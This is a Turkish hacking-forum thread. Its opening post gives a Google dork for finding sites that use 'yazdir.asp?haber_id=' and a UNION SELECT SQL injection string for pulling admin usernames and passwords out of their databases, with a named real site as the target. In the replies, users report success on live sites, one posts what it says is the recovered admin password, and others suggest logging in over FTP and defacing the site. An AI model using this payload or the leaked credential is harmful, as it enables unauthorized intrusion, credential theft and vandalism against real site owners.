Sitelerin şifrelerine ulaşmak ..:: Birde bu yoLu deneyin % 90 sonuç aLıcaksınız..

izmirLiiSe

New member
Reaction score
0
Merhaba arkadaşlar .. Hemen konuya giriyorum

1. yardımcımız google :) inurl:yazdir.asp?haber_id= yazıyorsuunuz ..

karşımıza çıkan sonuçlar http://www.aliaydinlioglu.com.tr/haber/yazdir.asp?haber_id=19 gibi oluyor.

işte püf noktamız.

çıkan adresin id= den sonrasını siliyoruz ve şunu ekliyoruz

1%20union%20select%200,admin,sifre,0,0,0,0,0,0,0,0,0,0,0%20from%20ayarlar%20where%20admin=admin

yani adres şu şekilde oluyor

http://www.aliaydinlioglu.com.tr/ha...,0,0,0,0,0,0,0 from ayarlar where admin=admin

ve Admin adı ve şifreleri önünüzde gerisi size kalmış mesela örnekte verdiğim sitede deniyebilirsiniz..

Kolay geLsin

ALINTIDIR.

Çok sağlam bir yöntem bir sitede denedim site daha ezik moderatör filn hiçbişey yoktu bıraktım bende :D

Dostum ayrıca senin verdiğin site üzerinde de denedim şifreyi buldum da nereye gircğimi bilimoyrum bişey koymamış adamlar :D

mehmethalkali
06mehmet06halkali

Ehehhe.çok kolay len :D

magriman' Alıntı:
Çok sağlam bir yöntem bir sitede denedim site daha ezik moderatör filn hiçbişey yoktu bıraktım bende :D

Dostum ayrıca senin verdiğin site üzerinde de denedim şifreyi buldum da nereye gircğimi bilimoyrum bişey koymamış adamlar :D
Şifresi:06mehmet06halkali

ftp den dene belki girersin

the-scream' Alıntı:
ftp den dene belki girersin
Arkadaşım çok isterdim de bizim bilgisayardaki ALG.EXE adlı dosya bozuk o yüzden FTPlere giremiyorum.Siz deneseniz olur mu benim için?İndex basarız böyle.Ama benim adımı da eklemeyi unutmayın ha :D

magriman' Alıntı:
Arkadaşım çok isterdim de bizim bilgisayardaki ALG.EXE adlı dosya bozuk o yüzden FTPlere giremiyorum.Siz deneseniz olur mu benim için?İndex basarız böyle.Ama benim adımı da eklemeyi unutmayın ha :D

valla kusura bakma millet vekili adam önce bi siteyi gör sonra teklif et :Sopa

baba yöntem sağlam.da bi türlü panellere giremiorum:(

Ne alaka ise hacking benim isim degil ben program crack ve serial + oyun film dizilerle ugrasirim.
Kaldiki daha yeni uyeyim...

abicim orda bir sürü site var açıkta olan bırakın milletvekilinin sitesiyle uğraşmayı devletle oyunmu oynuyorsunuz

denedim ama çalışmıyor sayfaları açmıyor

Geri